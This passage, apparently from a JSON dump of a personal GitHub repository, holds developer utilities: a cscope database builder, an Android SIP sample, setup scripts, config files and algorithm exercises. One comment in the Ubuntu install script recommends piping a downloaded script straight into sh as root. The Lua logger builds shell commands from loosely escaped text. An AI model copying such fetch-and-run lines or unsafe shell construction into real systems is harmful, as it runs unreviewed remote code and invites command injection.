\"y\":\n sys.exit(0)\n\nfile_list = open(file_list_name, \"w\")\n# should we check more directories?\ndirs = []\nexcluded_dirs = []\n\nif cmdline_options.include_dir:\n dirs.extend(cmdline_options.include_dir)\nif cmdline_options.exclude_dir:\n excluded_dirs.extend(cmdline_options.exclude_dir)\n\ndef convert_path(p):\n if cmdline_options.absolute:\n return os.path.abspath(p)\n else:\n return os.path.relpath(p)\n\ndef include_dirs_from_cfg(dir_path, cfg_name):\n cfg_file = os.path.join(dir_path, cfg_name)\n if os.path.isfile(cfg_file):\n if cmdline_options.verbose:\n print \"read configuration file from \" + cfg_file\n f = open(cfg_file)\n for line in f:\n line = line.strip() # remove possible \\n char\n if len(line) > 0 and not line.startswith(\"#\"):\n include = True\n if line.startswith(\"!\"):\n include = False\n line = line[1:]\n\n line = os.path.expanduser(line)\n if not os.path.isabs(line):\n # the line is relative to dir_path, join them so line is relative to current dir\n line = os.path.join(dir_path, line)\n line = convert_path(line)\n if include:\n search_dirs = dirs\n else:\n search_dirs = excluded_dirs\n if os.path.isdir(line):\n if search_dirs.count(line) == 0:\n search_dirs.append(line)\n elif cmdline_options.verbose:\n print line + \" is not a directory, omit it\"\n f.close()\n\ninclude_dirs_from_cfg(\"./\", cmdline_options.input_file)\n\n# find source files in all directories\ndef find_files(d, pattern, file_list):\n import re\n source_files = []\n for (root, subdirs, files) in os.walk(d, followlinks=True):\n for f in files:\n fpath = os.path.join(root, f)\n if re.match(pattern, fpath):\n # check if the file matches exclude_pattern\n should_exclude = False\n if cmdline_options.exclude:\n for exclude_pattern in cmdline_options.exclude:\n if re.match(exclude_pattern, fpath):\n should_exclude = True\n if cmdline_options.verbose:\n print \"exclude \" + fpath\n break\n if not should_exclude:\n # get real path of symbolic link\n # cscope can't deal with symbolic link\n fpath = convert_path(os.path.realpath(fpath))\n source_files.append(fpath + \"\\n\")\n i = 0\n while i < len(subdirs):\n d = subdirs[i]\n fpath = convert_path(os.path.join(root, d))\n if excluded_dirs.count(fpath) > 0:\n subdirs.remove(d)\n else:\n i += 1\n \n file_list.writelines(source_files)\n\nif cmdline_options.recursive:\n# include cfg files in other directories\n for d in dirs:\n include_dirs_from_cfg(d, cmdline_options.input_file)\n\n# make sure current directory is included\nif dirs.count(\".\") + dirs.count(\"./\") < 1:\n dirs.insert(0, \".\")\n\nj = 0\nfor d in dirs:\n dirs[j] = convert_path(d)\n j += 1\n\nj = 0\nfor d in excluded_dirs:\n excluded_dirs[j] = convert_path(d)\n j += 1\n\nfor d in dirs:\n print \"find \" + lan_type + \"source files in \" + d\n # change lan_pattern so that it works on python\n lan_pattern = lan_pattern.replace(\"\\(\", \"(\").replace(\"\\)\", \")\").replace(\"\\|\", \"|\")\n find_files(d, lan_pattern, file_list)\nfile_list.close()\n\n# actually generate database\nprint \"build cscope database\"\ncmd = [\"cscope\", \"-b\"]\nif cmdline_options.quick:\n cmd.append(\"-q\")\nif cmdline_options.kernel:\n cmd.append(\"-k\")\nsubprocess.Popen(cmd).wait()\nif cmdline_options.output_file != default_database_name:\n shutil.move(default_database_name, cmdline_options.output_file)\n if os.path.isfile(default_database_name_in):\n shutil.move(default_database_name_in, cmdline_options.output_file+\".in\")\n if os.path.isfile(default_database_name_po):\n shutil.move(default_database_name_po, cmdline_options.output_file+\".po\")\nprint \"done, cscope database saved in \" + cmdline_options.output_file\nif cmdline_options.ctags:\n print \"build ctags database\"\n cmd = [\"ctags\", \"-L\", file_list_name, \"--fields=l\"]\n subprocess.Popen(cmd).wait()\n print \"done, ctags database saved in tags\"\nif cmdline_options.gtags:\n print \"build gtags database\"\n cmd = [\"gtags\", \"-f\", file_list_name]\n subprocess.Popen(cmd).wait()\n print \"done, gtags database saved in GTAGS\"\nif not cmdline_options.preserve_filelist:\n os.remove(file_list_name)\n\n" }, { "alpha_fraction": 0.45261919498443604, "alphanum_fraction": 0.474985271692276, "avg_line_length": 25.96825408935547, "blob_id": "c43842967a96cf39c4c9aef1db55ff2ef91160be", "content_id": "349361ec8324c71f7a67abccf9c18cd9cea0aed7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1699, "license_type": "permissive", "max_line_length": 104, "num_lines": 63, "path": "/android/exosip_sample/sip_exe/jni/sipexe.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// =====================================================================================\n// \n// Filename: sipexe.cpp\n// \n// Description: \n// \n// Version: 1.0\n// Created: 12/10/2010 07:38:57 PM\n// Revision: none\n// Compiler: g++\n// \n// Author: Raymond Wen (), \n// Company: \n// \n// =====================================================================================\n\n#include\t<unistd.h>\n#include\t<android/log.h>\n#include\t<netinet/in.h>\n#include <eXosip2/eXosip.h>\n#include <iostream>\n#include\t<complex>\n\nconst char* const LOG_TAG = \"SIP_EXE\";\n\nstatic void android_trace_func(char *fi, int li, osip_trace_level_t level, char *chfr, va_list ap)\n{\n __android_log_vprint(ANDROID_LOG_VERBOSE, LOG_TAG, chfr, ap);\n}\n\nint main ( int argc, char *argv[] )\n{\n int i, port = 5060;\n osip_trace_initialize_func(END_TRACE_LEVEL, &android_trace_func);\n i=eXosip_init();\n if (i!=0)\n return -1;\n i = eXosip_listen_addr (IPPROTO_UDP, NULL, port, AF_INET, 0);\n if (i!=0)\n {\n eXosip_quit();\n __android_log_print(ANDROID_LOG_ERROR, LOG_TAG, \"%s\", \"could not initialize transport layer\\n\");\n return -1;\n }\n\n eXosip_event_t *je;\n for (;;)\n {\n je = eXosip_event_wait (0, 24*60*60*1000);\n eXosip_lock();\n eXosip_automatic_action ();\n eXosip_unlock();\n if (je == NULL)\n break;\n if (je->type == EXOSIP_CALL_INVITE)\n {\n __android_log_print(ANDROID_LOG_DEBUG, LOG_TAG, \"%s\", \"incoming call\\n\");\n std::cout << \"incoming call\" << std::endl;\n }\n }\n\n return 0;\n}\t\t\t\t// ---------- end of function main ----------\n" }, { "alpha_fraction": 0.7391546368598938, "alphanum_fraction": 0.7513904571533203, "avg_line_length": 58.93333435058594, "blob_id": "b84850114993f9bf1a1baee01d484d4c6de61735", "content_id": "561f727b1c4985a2314fe451cabacf2124c0d52f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1798, "license_type": "permissive", "max_line_length": 484, "num_lines": 30, "path": "/settings/install_ubuntu_tools.sh", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# run this script as root, sudo su -l\n\narray=(sysstat apt-file ipset htop dsniff iftop openssh-server awesome awesome-extra gnome-settings-daemon realpath socat proxychains gpick gnupg2 silversearcher-ag shutter parcellite zsh mpg123 ncurses-dev p7zip tofrodos check g++ cppcheck mercurial git-core git-extras gitk tig git-svn valgrind cgdb python-pip wireshark nmap vim-gnome ctags cscope expect flex doxygen graphviz pandoc goldendict sdcv dmenu manpages-posix-dev clang libclang-dev astyle global libc6-dev-i386 autossh)\n\nlen=${#array[*]}\ni=0\nwhile [ $i -lt $len ]; do\n echo \"sudo apt-get install -y ${array[$i]}\"\n sudo apt-get install -y ${array[$i]}\n let i++\n done\n\n# add my account to docker group to avoid having to run docker as root: sudo usermod -a -G docker current_user_name\n# change docker run time root dir: sudo ln -s /home/raymond/projects/docker/runtime_root /var/lib/docker\n# the docker.io/docker in ubuntu repository isn't maintained by docker team and it's out of date,\n# it's recommended to use this command to install docker: wget -qO- https://get.docker.com/ | sh\n\n# for chinese input, user fcitx-googlepinyin\n# add zsh-completion & zsh-syntax-highlighter plugins for on-my-zsh (place in ~/.oh-my-zsh/custom/plugins/)\ngit clone https://github.com/zsh-users/zsh-autosuggestions ~/.oh-my-zsh/custom/plugins/zsh-autosuggestions\ngit clone https://github.com/zsh-users/zsh-syntax-highlighting ~/.oh-my-zsh/custom/plugins/zsh-syntax-highlighting\nwget https://raw.githubusercontent.com/clvv/fasd/master/fasd\n\n# for serial port accessing, install ckermit\n# create \"KERNEL==\"ttyUSB*\", MODE=\"0666\" rule in /etc/udev/rules.d/50-usb-tty.rules, then use kermit -l /dev/ttyUSB* -b 115200 to access\n\n# additional tools\n# smplayer gnome-applets\n" }, { "alpha_fraction": 0.52173912525177, "alphanum_fraction": 0.5286040902137756, "avg_line_length": 14.607142448425293, "blob_id": "a3c5f6345a4a0ddddd9ca519736360328f38c82d", "content_id": "3dc2a31fe9d0c8c1702cbd24e100162aa6f09c83", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 437, "license_type": "permissive", "max_line_length": 94, "num_lines": 28, "path": "/settings/ubuntu_home/etc_init.d_shadowsocks", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\n# use sudo update-rc.d shadowsocks defaults command to start shadowsocks service automatically\n\nstart(){\n sslocal -c /opt/shadowsocks.json -d start\n}\n\nstop(){\n sslocal -c /opt/shadowsocks.json -d stop\n}\n\ncase \"$1\" in\n start)\n start\n ;;\n stop)\n stop\n ;;\n reload)\n stop\n start\n ;;\n *)\n echo \"Usage: $0 {start|reload|stop}\"\n exit 1\n ;;\nesac\n" }, { "alpha_fraction": 0.6103004217147827, "alphanum_fraction": 0.6111587882041931, "avg_line_length": 30.81690216064453, "blob_id": "23187d902eb65e89ba9e475b2b21e6c0802a924e", "content_id": "bfc35ef31f8bbf2d73c733fd83c3c842f408a572", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2330, "license_type": "permissive", "max_line_length": 94, "num_lines": 71, "path": "/android/mplayer/src/com/rmd/mplayer/VideoSelector.java", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "package com.rmd.mplayer;\r\n\r\nimport android.app.ListActivity;\r\nimport android.content.ContentResolver;\r\nimport android.content.Intent;\r\nimport android.database.Cursor;\r\nimport android.os.Bundle;\r\nimport android.provider.MediaStore;\r\nimport android.view.View;\r\nimport android.widget.ListView;\r\nimport android.widget.SimpleCursorAdapter;\r\n\r\npublic class VideoSelector extends ListActivity {\r\n\r\n public static final String FILE_PATH = \"FILE_PATH\";\t\r\n public void onCreate(Bundle icicle)\r\n {\r\n super.onCreate(icicle);\r\n init();\r\n }\r\n\r\n public void init() {\r\n setContentView(R.layout.video_selector);\r\n\r\n MakeCursor();\r\n\r\n // Map Cursor columns to views defined in media_list_item.xml\r\n SimpleCursorAdapter adapter = new SimpleCursorAdapter(\r\n this,\r\n android.R.layout.simple_list_item_1,\r\n mCursor,\r\n new String[] { MediaStore.Video.Media.TITLE},\r\n new int[] { android.R.id.text1 });\r\n\r\n setListAdapter(adapter);\r\n }\r\n\r\n @Override\r\n protected void onListItemClick(ListView l, View v, int position, long id)\r\n {\r\n \tString filePath = mCursor.getString(mCursor.getColumnIndex(MediaStore.Video.Media.DATA));\r\n mCursor.moveToPosition(position);\r\n Intent result = new Intent();\r\n\t\tresult.putExtra(FILE_PATH, filePath);\r\n setResult(RESULT_OK, result);\r\n finish();\r\n }\r\n\r\n private void MakeCursor() {\r\n String[] cols = new String[] {\r\n MediaStore.Video.Media._ID,\r\n MediaStore.Video.Media.TITLE,\r\n MediaStore.Video.Media.DATA,\r\n MediaStore.Video.Media.MIME_TYPE,\r\n MediaStore.Video.Media.ARTIST\r\n };\r\n ContentResolver resolver = getContentResolver();\r\n if (resolver == null) {\r\n System.out.println(\"resolver = null\");\r\n } else {\r\n mSortOrder = MediaStore.Video.Media.TITLE + \" COLLATE UNICODE\";\r\n mWhereClause = MediaStore.Video.Media.TITLE + \" != ''\";\r\n mCursor = resolver.query(MediaStore.Video.Media.EXTERNAL_CONTENT_URI,\r\n cols, mWhereClause , null, mSortOrder);\r\n }\r\n }\r\n\r\n private Cursor mCursor;\r\n private String mWhereClause;\r\n private String mSortOrder;\r\n}\r\n" }, { "alpha_fraction": 0.6323278546333313, "alphanum_fraction": 0.6476949453353882, "avg_line_length": 24.449275970458984, "blob_id": "0011cd6074c6dd34c45dec67ca9f432ba8e36a1d", "content_id": "65cb20a106cdd0f2ee0397e335d15f7660a04241", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1757, "license_type": "permissive", "max_line_length": 75, "num_lines": 69, "path": "/android/adb/framebuffer_service.c", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2007 The Android Open Source Project\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\n#include <stdlib.h>\n#include <stdio.h>\n#include <unistd.h>\n#include <string.h>\n#include <fcntl.h>\n\n#include \"fdevent.h\"\n#include \"adb.h\"\n\n#include <linux/fb.h>\n#include <sys/ioctl.h>\n#include <sys/mman.h>\n\n/* TODO:\n** - grab the current buffer, not the first buffer\n** - sync with vsync to avoid tearing\n*/\n\nvoid framebuffer_service(int fd, void *cookie)\n{\n struct fb_var_screeninfo vinfo;\n int fb;\n void *ptr = MAP_FAILED;\n char x;\n\n unsigned fbinfo[4];\n\n fb = open(\"/dev/graphics/fb0\", O_RDONLY);\n if(fb < 0) goto done;\n\n if(ioctl(fb, FBIOGET_VSCREENINFO, &vinfo) < 0) goto done;\n fcntl(fb, F_SETFD, FD_CLOEXEC);\n\n fbinfo[0] = 16;\n fbinfo[1] = vinfo.xres * vinfo.yres * 2;\n fbinfo[2] = vinfo.xres;\n fbinfo[3] = vinfo.yres;\n\n ptr = mmap(0, fbinfo[1], PROT_READ, MAP_SHARED, fb, 0);\n if(ptr == MAP_FAILED) goto done;\n\n if(writex(fd, fbinfo, sizeof(unsigned) * 4)) goto done;\n\n for(;;) {\n if(readx(fd, &x, 1)) goto done;\n if(writex(fd, ptr, fbinfo[1])) goto done;\n }\n\ndone:\n if(ptr != MAP_FAILED) munmap(ptr, fbinfo[1]);\n if(fb >= 0) close(fb);\n close(fd);\n}\n\n" }, { "alpha_fraction": 0.8286778330802917, "alphanum_fraction": 0.8379888534545898, "avg_line_length": 75.71428680419922, "blob_id": "6abb5317fe0e15528b588d71faf91a56dc0a5277", "content_id": "0a97041e933c3877a544765969046e035103068b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 537, "license_type": "permissive", "max_line_length": 377, "num_lines": 7, "path": "/settings/osx_brew_tools.md", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "brew install\niproute2mac md5sha1sum zsh python ctags cscope gpg git git-extras tig tmux nmap doxygen graphviz astyle clang-format pandoc iftop p7zip unrar tofrodos jq ag ripgrep progress proxychains-ng mycli autoconf automake libtool plantuml docker docker-compose docker-machine platformio httpie polipo autossh cmake socat jsonlint cppchek flake8 shellcheck dive ctop grv jid annie vegeta\n\n# srecord\n# reattach-to-user-namespace --wrap-pbcopy-and-pbpaste\nbrew cask install\nwireshark java mactex ngrok macvim --with-override-system-vim\n" }, { "alpha_fraction": 0.6179487109184265, "alphanum_fraction": 0.6179487109184265, "avg_line_length": 7.8481011390686035, "blob_id": "fa28286384db09f04d7a29a701116d29df187da4", "content_id": "8fe21dfb254a05cef23678d5f9de5441e337ab49", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 780, "license_type": "permissive", "max_line_length": 15, "num_lines": 79, "path": "/settings/totalcmd/usercmd.ini", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "[em_GotoDriveG]\r\nbutton=\r\ncmd=cd g:\r\n\r\n[em_GotoDriveH]\r\nbutton=\r\ncmd=cd H:\r\n\r\n[em_GotoDriveI]\r\nbutton=\r\ncmd=cd I:\r\n\r\n[em_GotoDriveJ]\r\nbutton=\r\ncmd=cd J:\r\n\r\n[em_GotoDriveK]\r\nbutton=\r\ncmd=cd K:\r\n\r\n[em_GotoDriveL]\r\nbutton=\r\ncmd=cd L:\r\n\r\n[em_GotoDriveM]\r\nbutton=\r\ncmd=cd M:\r\n\r\n[em_GotoDriveN]\r\nbutton=\r\ncmd=cd N:\r\n\r\n[em_GotoDriveO]\r\nbutton=\r\ncmd=cd O:\r\n\r\n[em_GotoDriveP]\r\nbutton=\r\ncmd=cd P:\r\n\r\n[em_GotoDriveQ]\r\nbutton=\r\ncmd=cd Q:\r\n\r\n[em_GotoDriveR]\r\nbutton=\r\ncmd=cd R:\r\n\r\n[em_GotoDriveS]\r\nbutton=\r\ncmd=cd S:\r\n\r\n[em_GotoDriveT]\r\nbutton=\r\ncmd=cd T:\r\n\r\n[em_GotoDriveU]\r\nbutton=\r\ncmd=cd U:\r\n\r\n[em_GotoDriveV]\r\nbutton=\r\ncmd=cd V:\r\n\r\n[em_GotoDriveW]\r\nbutton=\r\ncmd=cd W:\r\n\r\n[em_GotoDriveX]\r\nbutton=\r\ncmd=cd X:\r\n\r\n[em_GotoDriveY]\r\nbutton=\r\ncmd=cd Y:\r\n\r\n[em_StartBash]\r\nbutton=\r\ncmd=mintty\r\n\r\n" }, { "alpha_fraction": 0.5307443141937256, "alphanum_fraction": 0.5307443141937256, "avg_line_length": 21.769229888916016, "blob_id": "d8386fb8f03d94a623cf422fa3a26022fc98c169", "content_id": "044b5a6c9fb8bcca01d6c1da853f7015777deb76", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 309, "license_type": "permissive", "max_line_length": 78, "num_lines": 13, "path": "/wince/ce_profiling/profiling_lib/profile_func.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#include \"stdafx.h\"\r\n\r\nextern \"C\" \r\n{\r\n void _CAP_Enter_Function(void *p) \r\n {\r\n printf(\"Enter function (at address %p) at %d\\n\", p, GetTickCount());\r\n }\r\n void _CAP_Exit_Function(void *p) \r\n {\r\n printf(\"Leaving function (at address %p) at %d\\n\", p, GetTickCount());\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.5596491098403931, "alphanum_fraction": 0.5631579160690308, "avg_line_length": 32.52941131591797, "blob_id": "b0430b7baea171b82491b3ef37ea6fb50d35bf03", "content_id": "7f1d534f79bca78485278fcded63bc7ff106cc99", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 570, "license_type": "permissive", "max_line_length": 73, "num_lines": 17, "path": "/settings/ubuntu_home/awesome/logger.lua", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "enable_debug = true\nfunction debug_message(msg,title,log_type)\n if not enable_debug then\n return\n end\n log_type = log_type or \"notify-send\"\n title = title or \"awesome_debugging\"\n if log_type == \"syslog\" then\n io.popen('printf \"'..string.gsub(msg,'[\"]','\\\\%1')..'\" | logger')\n elseif log_type == \"notify-send\" then\n io.popen('notify-send \"awesome debug\" \"'\n ..string.gsub(msg,'[\"]','\\\\%1')..'\"')\n else\n io.popen('notify-send \"awesome debug\" \"'\n ..log_type..' is not a known log method\"')\n end\nend\n" }, { "alpha_fraction": 0.3145400583744049, "alphanum_fraction": 0.3397625982761383, "avg_line_length": 23.071428298950195, "blob_id": "e4d584075f0da88734e5aa9ef671ee7783262dbb", "content_id": "2d8060936642ea83b5d05f51eabc3d965a6e2fd8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 674, "license_type": "permissive", "max_line_length": 88, "num_lines": 28, "path": "/android/logtest/logtest.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// =====================================================================================\n// \n// Filename: logtest.cpp\n// \n// Description: \n// \n// Version: 1.0\n// Created: 02/01/2010 02:22:56 PM\n// Revision: none\n// Compiler: g++\n// \n// Author: Raymond Wen (), \n// Company: \n// \n// =====================================================================================\n\n\n#include\t\"cutils/log.h\"\n\nint main ( int argc, char *argv[] )\n{\n LOGE(\"log ERROR\");\n LOGW(\"log WARN\");\n LOGD(\"log DEBUG\");\n LOGI(\"log INFORMATION\");\n LOGV(\"log VERBOSE\");\n return 0;\n}\t\t\t\t// ---------- end of function main ----------\n" }, { "alpha_fraction": 0.41508620977401733, "alphanum_fraction": 0.4375, "avg_line_length": 26.951807022094727, "blob_id": "9236aa151d73a1ea91317f3a7f819a7bcea22667", "content_id": "de708fd1dbf70c4071ccd09f17a54795bdaa7581", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2320, "license_type": "permissive", "max_line_length": 177, "num_lines": 83, "path": "/algorithm/leetcode/5_longest_palindromic_substring.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "/*\n * http://leetcode.com/onlinejudge#question_5\n *\n * Longest Palindromic SubstringNov 11 '114008 / 13367\n *\n * Given a string S, find the longest palindromic substring in S. You may assume that the maximum length of S is 1000, and there exists one unique longest palindromic substring.\n *\n */\n\n#include <iostream>\n#include <string>\n\nusing namespace std;\nclass Solution {\n public:\n enum { MAXLEN = 1000 };\n Solution() {\n for(int i = 0; i < MAXLEN; ++i)\n for(int j = 0; j < MAXLEN; ++j)\n matrix[i][j] = -1;\n }\n\n string longestPalindrome(string s) {\n // initialization\n for(int i = 0; i < s.length(); ++i) {\n matrix[i][i] = true;\n matrix[0][i] = isPalindromicString(s, 0, i);\n }\n\n for(int i = 1; i < s.length()-1; ++i) {\n for(int j = i+1; j < s.length(); ++j) {\n if(matrix[i][j] != -1)\n continue;\n isPalindromicString_dp(s, i, j);\n }\n }\n\n // find longest string\n for(int len = s.length(); len > 0; --len) {\n for(int i = 0, j = len - i - 1; i <= s.length()-len; ++i, ++j) {\n if(matrix[i][j]) {\n return s.substr(i, j-i+1);\n }\n }\n }\n return s;\n }\n\n\n private:\n\n // the matrix is used for recording if str[i~j] is palindromic\n int matrix[MAXLEN][MAXLEN];\n\n void isPalindromicString_dp(string s, int i, int j) {\n if((i+1<=j-1) && matrix[i+1][j-1] == -1)\n isPalindromicString_dp(s, i+1, j-1);\n if((i+1>j-1 || matrix[i+1][j-1]) && s[i] == s[j])\n matrix[i][j] = 1;\n else\n matrix[i][j] = 0;\n }\n\n int isPalindromicString(string s, int start, int end) {\n while(end > start) {\n if(s[end] != s[start]) \n return 0;\n\n --end;\n ++start;\n }\n return 1;\n }\n\n};\n\nint main(int argc, const char *argv[]) {\n Solution slu;\n string s(\"banana\");\n cout << slu.longestPalindrome(s) << endl;\n //cout << s << endl;\n return 0;\n}\n" }, { "alpha_fraction": 0.4265536665916443, "alphanum_fraction": 0.4403640925884247, "avg_line_length": 22.697673797607422, "blob_id": "5b14bf402966ffe7f783104f8539a9d38af739fd", "content_id": "775922dd3d27774453e23ccbea3500035d96967e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3186, "license_type": "permissive", "max_line_length": 88, "num_lines": 129, "path": "/algorithm/i2a_ex_9.3-9/ex9_3_9.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// =====================================================================================\r\n// \r\n// Filename: 9_3_9.cpp\r\n// \r\n// Description: solution to exercise 9.3-9 of Introduction to algorithms\r\n// \r\n// Version: 1.0\r\n// Created: 12/14/2009 8:32:45 PM\r\n// Revision: none\r\n// Compiler: cl.exe\r\n// \r\n// Author: Raymond Wen (), \r\n// Company: \r\n// \r\n// =====================================================================================\r\n\r\n#include\t<time.h>\r\n#include\t<cstdlib>\r\n#include\t<vector>\r\n#include\t<iostream>\r\n#include\t<assert.h>\r\n\r\ntypedef std::vector<int> int_vector;\r\n\r\nvoid printVec (const int_vector& vec);\r\nint random()\r\n{\r\n static int initialized = false;\r\n if(!initialized)\r\n {\r\n srand(static_cast<unsigned int>(time(NULL)));\r\n initialized = true;\r\n }\r\n\r\n return rand();\r\n}\t\t// ---------- end of function random ----------\r\n\r\nvoid swap(int_vector& vec, int i, int j)\r\n{\r\n int temp = vec[i];\r\n vec[i] = vec[j];\r\n vec[j] = temp;\r\n}\t\t// ---------- end of function swap ----------\r\n\r\nint partition(int_vector& vec)\r\n{\r\n if(vec.size() == 1)\r\n return 0;\r\n int i = 0, j = 1;\r\n int r = random() % vec.size();\r\n swap(vec, 0, r); \r\n int pivot = vec[0];\r\n\r\n while(j < vec.size())\r\n {\r\n if(vec[j] <= pivot)\r\n {\r\n int temp = vec[j];\r\n vec[j] = vec[i+1];\r\n vec[i] = temp;\r\n ++i;\r\n }\r\n ++j;\r\n }\r\n vec[i] = pivot;\r\n\r\n return i;\r\n}\t\t// ---------- end of function partition ----------\r\n\r\nvoid quickSort(int_vector& vec)\r\n{\r\n if(vec.size() < 2)\r\n return;\r\n int p = partition(vec);\r\n int pivot = vec[p];\r\n int_vector low, high;\r\n high.insert(high.begin(), vec.begin()+p+1, vec.end());\r\n low.insert(low.begin(), vec.begin(), vec.begin()+p);\r\n vec.clear();\r\n quickSort(low);\r\n quickSort(high);\r\n vec.insert(vec.end(), low.begin(), low.end());\r\n vec.push_back(pivot);\r\n vec.insert(vec.end(), high.begin(), high.end());\r\n}\t\t// ---------- end of function quickSort----------\r\n\r\nint getKthItem (int_vector& vec, int k)\r\n{\r\n assert(k <= vec.size());\r\n int i = 0;\r\n i = partition(vec);\r\n if(i == k - 1)\r\n return vec[i];\r\n else\r\n {\r\n if(i > k - 1)\r\n {\r\n vec.erase(vec.begin() + i, vec.end());\r\n return getKthItem(vec, k);\r\n }\r\n else\r\n {\r\n vec.erase(vec.begin(), vec.begin() + i + 1);\r\n return getKthItem(vec, k-i-1);\r\n }\r\n }\r\n}\t\t// ----- end of function getIthItem -----\r\n\r\nvoid printVec (const int_vector& vec)\r\n{\r\n for each(int i in vec)\r\n std::cout << i << \" \";\r\n std::cout << std::endl;\r\n}\t\t// ----- end of function printVec -----\r\n\r\nint main ( int argc, char *argv[] )\r\n{\r\n int_vector vec;\r\n int size = 5;\r\n if(argc > 1)\r\n size = atoi(argv[1]);\r\n for(int i = 0; i < size; ++i)\r\n vec.push_back(random()%100);\r\n printVec(vec);\r\n// quickSort(vec);\r\n// printVec(vec);\r\n std::cout << getKthItem(vec, 3) << std::endl;\r\n return 0;\r\n}\t\t// ---------- end of function main ----------\r\n" }, { "alpha_fraction": 0.743842363357544, "alphanum_fraction": 0.7536945939064026, "avg_line_length": 21.55555534362793, "blob_id": "b43ac6620b30bc6d3d5181512aa83d4cc97b264b", "content_id": "1c01d6f526e05feaec5c99e46f94088f244e80ef", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 203, "license_type": "permissive", "max_line_length": 51, "num_lines": 9, "path": "/seminars/alsa_introduction/makefile", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "all: ppt\n\nimg:\n\tdot -o history.png -Tpng history.dot\n\tdot -o architecture.png -Tpng architecture.dot\n\tdot -o architecture_2.png -Tpng architecture_2.dot\n\nppt: img\n\txelatex -interaction=nonstopmode *.tex\n" }, { "alpha_fraction": 0.7234042286872864, "alphanum_fraction": 0.7276595830917358, "avg_line_length": 11.368420600891113, "blob_id": "091f89f5755517b9f307e95991e06a352140ba98", "content_id": "200222371d3dd6cd72804ddb4c21f5db00979800", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 235, "license_type": "permissive", "max_line_length": 30, "num_lines": 19, "path": "/android/pupnp_jni/Makefile", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "all: jni java\n\n.PHONY: jni install clean java\n\njni:\n\tndk-build -C jni V=1\n\njava:\n\tant clean\n\tant debug\n\ninstall:\n\tadb uninstall com.rmd.tpupnp\n\tant debug install\n\nclean:\n\tadb uninstall com.rmd.tpupnp\n\tndk-build -C jni clean\n\tant clean\n" }, { "alpha_fraction": 0.6662589311599731, "alphanum_fraction": 0.6835881471633911, "avg_line_length": 25.22994613647461, "blob_id": "40b4b78a37856453f568199600136352adfc9527", "content_id": "28757a9dad756725838d48f3344c4d1f48469156", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 4905, "license_type": "permissive", "max_line_length": 78, "num_lines": 187, "path": "/android/pupnp_jni/jni/build/inc/autoconfig.h", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "/* autoconfig.h. Generated from autoconfig.h.in by configure. */\n/* autoconfig.h.in. Generated from configure.ac by autoheader. */\n\n/* Define to 1 to compile debug code */\n/* #undef DEBUG */\n\n/* Define to 1 if you have the <arpa/inet.h> header file. */\n#define HAVE_ARPA_INET_H 1\n\n/* Define to 1 if you have the <dlfcn.h> header file. */\n#define HAVE_DLFCN_H 1\n\n/* Define to 1 if you don't have `vprintf' but do have `_doprnt.' */\n/* #undef HAVE_DOPRNT */\n\n/* Define to 1 if you have the <fcntl.h> header file. */\n#define HAVE_FCNTL_H 1\n\n/* Define to 1 if fseeko (and presumably ftello) exists and is declared. */\n#define HAVE_FSEEKO 1\n\n/* Define to 1 if you have the <inttypes.h> header file. */\n#define HAVE_INTTYPES_H 1\n\n/* Define to 1 if you have the <limits.h> header file. */\n#define HAVE_LIMITS_H 1\n\n/* Define to 1 if you have the <memory.h> header file. */\n#define HAVE_MEMORY_H 1\n\n/* Define to 1 if you have the <netdb.h> header file. 